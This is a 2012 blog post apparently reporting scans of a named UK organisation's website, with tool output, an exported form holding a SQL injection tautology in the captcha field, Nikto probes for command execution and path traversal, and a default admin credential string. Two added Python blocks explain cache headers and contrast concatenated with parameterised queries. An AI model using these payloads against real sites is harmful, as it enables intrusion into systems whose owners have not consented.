Vulnerability found in http://ncc.co.uk

Posted: September 11, 2012 in Uncategorized

Info first

root@bt:/pentest/enumeration/web/whatweb# ./whatweb ncc.c
http://ncc.co.uk [200] Cookies[ncc], Email[info@ncc.co.uk], Google-Analytics[UA-11579552-1], Title[National Computing Centre  | Home], PHP[5.2.17], JQuery, X-Powered-By[PHP/5.2.17], Country[UNITED KINGDOM][GB], Apache, HTTPServer[Apache], IP[88.98.24.202]

The index.php response header contains an Expires date that has long since been and gone:

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.17
Transfer-Encoding: chunked
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Tue, 11 Sep 2012 03:02:58 GMT
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="content-language" content="en" />
<script type="text/javascript"> var url_address = "http://ncc.co.uk/"; </script>
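As an added check, not part of the original post, the routine below parses a raw HTTP response like the one above and works out its effective caching policy the way a cache would: under RFC 7234, Cache-Control directives take precedence over Expires, so a long-past Expires date sitting beside `Cache-Control: no-store, no-cache, must-revalidate` is the conventional way of forbidding caching rather than a misconfiguration (this exact header set, 19 Nov 1981 included, is what PHP's default session cache limiter emits). It also collects the `Server` and `X-Powered-By` values, since version disclosure is the finding a reviewer would actually raise from these headers. The sample response is constructed from the headers quoted above with a stub body.

```python
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime

# Constructed sample: the response headers quoted above, with a stub body.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "X-Powered-By: PHP/5.2.17\r\n"
    "Transfer-Encoding: chunked\r\n"
    "Expires: Thu, 19 Nov 1981 08:52:00 GMT\r\n"
    "Server: Apache\r\n"
    "Pragma: no-cache\r\n"
    "Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\n"
    "Date: Tue, 11 Sep 2012 03:02:58 GMT\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<!DOCTYPE html>...\r\n"
)


def parse_response(raw):
    """Split a raw HTTP/1.x response into (status line, headers dict).
    Header names are lower-cased; repeated headers are joined with commas,
    the RFC 7230 combining rule, which is what Cache-Control needs."""
    head, _sep, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        name, value = name.strip().lower(), value.strip()
        headers[name] = headers[name] + ", " + value if name in headers else value
    return lines[0], headers


def cache_policy(raw):
    """Decide whether a cache may store the response, following the RFC 7234
    precedence: Cache-Control directives override Expires."""
    _status, h = parse_response(raw)
    directives = {
        d.strip().split("=", 1)[0].lower()
        for d in h.get("cache-control", "").split(",") if d.strip()
    }

    expires_stale = None
    if "expires" in h:
        try:
            expires = parsedate_to_datetime(h["expires"])
            # Judge staleness against the origin's own clock when it sends Date.
            ref = parsedate_to_datetime(h["date"]) if "date" in h else datetime.now(timezone.utc)
            expires_stale = expires <= ref
        except (TypeError, ValueError):
            # RFC 7234 s5.3: an unparsable Expires counts as already expired.
            expires_stale = True

    if "no-store" in directives:
        cacheable, reason = False, "Cache-Control: no-store"
    elif "no-cache" in directives:
        cacheable, reason = False, "Cache-Control: no-cache (revalidate every time)"
    elif directives & {"max-age", "s-maxage"}:
        cacheable, reason = True, "Cache-Control freshness lifetime (Expires ignored)"
    elif expires_stale is True:
        cacheable, reason = False, "Expires in the past"
    elif expires_stale is False:
        cacheable, reason = True, "Expires in the future"
    else:
        cacheable, reason = None, "no explicit policy; caches may apply heuristics"

    # Separate finding: headers that disclose the server stack and version.
    disclosed = {k: h[k] for k in ("server", "x-powered-by") if k in h}
    return {"cacheable": cacheable, "reason": reason,
            "expires_stale": expires_stale, "disclosed": disclosed}


if __name__ == "__main__":
    print(cache_policy(SAMPLE_RESPONSE))
```

For the response above this reports `cacheable: False` with `no-store` as the deciding directive, `expires_stale: True` as a side note, and `PHP/5.2.17` under disclosed headers; the stale date alone would only matter on a response that carried no Cache-Control at all.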

Blind SQLi in captcha!

During a few scans with BackTrack, here's a vulnerability I found on their site. This first one sits on http://ncc.co.uk/index.php/index.php in the captcha token:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>Exported HTTP Request from W3AF</title>
</head>
<body>
<form action="http://ncc.co.uk/index.php" method="POST">
<label>website</label>
<input type="text" name="website" value="http://w3af.sf.net/">
<label>comment</label>
<input type="text" name="comment" value="Hi hunny I’m home">
<label>firstname</label>
<input type="text" name="firstname" value="John">
<label>lastname</label>
<input type="text" name="lastname" value="Smith">
<label>company</label>
<input type="text" name="company" value="Bonsai">
<label>telephone</label>
<input type="text" name="telephone" value="55550178">
<label>captcha</label>
<input type="text" name="captcha" value="84" OR "84"="84">
<label>postcode</label>
<input type="text" name="postcode" value="55550178">
<label>address</label>
<input type="text" name="address" value="Bonsai Street 123">
<label>Accreditation_4_action</label>
<input type="text" name="Accreditation_4_action" value="submit">
<label>form</label>
<input type="text" name="form" value="4">
<label>title</label>
<input type="text" name="title" value="">
<label>jobtitle</label>
<input type="text" name="jobtitle" value="Hunter">
<label>email</label>
<input type="text" name="email" value="w3af@techsupportbase.net">
<label>mode</label>
<input type="text" name="mode" value="56">
<label>captcha_token</label>
<input type="text" name="captcha_token" value="4e49734857717649364c72367738453d">
<label>page</label>
<input type="text" name="page" value="689">
<input type="submit">
</form>
</body>
</html>
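The exported request above shows the tautology `"84" OR "84"="84"` in the captcha field. As an added illustration of why that works and how to close it, the Python below is a hypothetical server-side captcha check, not the site's code (the site runs PHP and its storage is unknown): an in-memory SQLite table keyed by the opaque `captcha_token` the form carries, a concatenated query of the kind that lets the tautology through, and a hardened check that binds parameters, allow-lists the shape of both fields, and burns the token after one successful use so a solved challenge cannot be replayed. The stored answer `17` is made up; the token is the one from the request above. The payload is written with single quotes because the demo runs on SQLite, which does not reliably treat double-quoted text as a string literal (MySQL accepts both).

```python
import re
import sqlite3

# Constructed sample data: the captcha token from the exported request above,
# paired with a made-up answer. A real store would hold one row per challenge.
SAMPLE_TOKEN = "4e49734857717649364c72367738453d"
SAMPLE_ANSWER = "17"


def make_db():
    """In-memory SQLite table standing in for a captcha store (hypothetical)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE captcha (token TEXT PRIMARY KEY, answer TEXT NOT NULL)")
    conn.execute("INSERT INTO captcha VALUES (?, ?)", (SAMPLE_TOKEN, SAMPLE_ANSWER))
    conn.commit()
    return conn


def check_captcha_concat(conn, token, answer):
    """The vulnerable pattern: request fields spliced into the SQL text.
    A tautology in `answer` turns the WHERE clause true for every row."""
    sql = ("SELECT COUNT(*) FROM captcha WHERE token = '%s' AND answer = '%s'"
           % (token, answer))
    return conn.execute(sql).fetchone()[0] > 0


def check_captcha_param(conn, token, answer):
    """Hardened: bound parameters. The driver passes the values separately from
    the statement, so quotes and keywords inside them are never parsed as SQL."""
    row = conn.execute(
        "SELECT COUNT(*) FROM captcha WHERE token = ? AND answer = ?",
        (token, answer),
    ).fetchone()
    return row[0] > 0


# Allow-list shapes for the two fields: 32 lowercase hex chars for the token,
# a short digit string for the answer. Rejecting anything else before the
# query keeps junk out of the database and the logs, whatever the query style.
TOKEN_RE = re.compile(r"[0-9a-f]{32}")
ANSWER_RE = re.compile(r"[0-9]{1,6}")


def verify_captcha(conn, token, answer):
    """Validate shape, check with bound parameters, then burn the token so a
    solved challenge cannot be replayed on a later submission."""
    if not (TOKEN_RE.fullmatch(token) and ANSWER_RE.fullmatch(answer)):
        return False
    if not check_captcha_param(conn, token, answer):
        return False
    conn.execute("DELETE FROM captcha WHERE token = ?", (token,))
    conn.commit()
    return True


# The tautology from the form above, in single-quote form for SQLite.
PAYLOAD = "84' OR '84'='84"

if __name__ == "__main__":
    db = make_db()
    print("concat, payload:", check_captcha_concat(db, SAMPLE_TOKEN, PAYLOAD))
    print("param,  payload:", check_captcha_param(db, SAMPLE_TOKEN, PAYLOAD))
    print("verify, payload:", verify_captcha(db, SAMPLE_TOKEN, PAYLOAD))
    print("verify, correct:", verify_captcha(db, SAMPLE_TOKEN, SAMPLE_ANSWER))
    print("verify, replay: ", verify_captcha(db, SAMPLE_TOKEN, SAMPLE_ANSWER))
```

Only the concatenated check accepts the payload: `AND` binds tighter than `OR`, so the spliced clause reads `(token = ... AND answer = '84') OR '84'='84'`. With bound parameters the same text is compared as a literal answer and fails, and the shape check rejects it before any query runs; the final replay call fails because the token was deleted on first success.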

19 items found, to be treated as suspected vulnerabilities:

root@bt:/pentest/web/nikto# ./nikto.pl -h http://ncc.co.uk
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          88.98.24.202
+ Target Hostname:    ncc.co.uk
+ Target Port:        80
+ Start Time:         2012-09-10 21:17:29 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache
+ Retrieved x-powered-by header: PHP/5.2.17
+ robots.txt contains 2 entries which should be manually viewed.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-17664: /_mem_bin/remind.asp: Page will give the password reminder for any user requested (username must be known).
+ OSVDB-724: /cgi-bin/ans.pl?p=../../../../../usr/bin/id|&blah: Avenger's News System allows commands to be issued remotely.
+ OSVDB-724: /cgi-bin/ans/ans.pl?p=../../../../../usr/bin/id|&blah: Avenger's News System allows commands to be issued remotely.
+ OSVDB-3233: /mailman/listinfo: Mailman was found on the server.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /certificates: This might be interesting…
+ OSVDB-3092: /img-sys/: Default image directory should not allow directory listing.
+ OSVDB-3092: /java-sys/: Default Java directory should not allow directory listing.
+ OSVDB-3299: /forumscalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: /forumzcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: /htforumcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: /vbcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: /vbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-3299: /cgi-bin/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20”;%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
+ OSVDB-724: /ans.pl?p=../../../../../usr/bin/id|&blah: Avenger's News System allows commands to be issued remotely.  http://ans.gq.nu/ default admin string 'admin:aaLR8vE.jjhss:root@127.0.0.1', password file location 'ans_data/ans.passwd'
+ OSVDB-724: /ans/ans.pl?p=../../../../../usr/bin/id|&blah: Avenger's News System allows commands to be issued remotely.
+ 6474 items checked: 64 error(s) and 19 item(s) reported on remote host
+ End Time:           2012-09-10 22:14:47 (GMT-4) (3438 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Screenshot
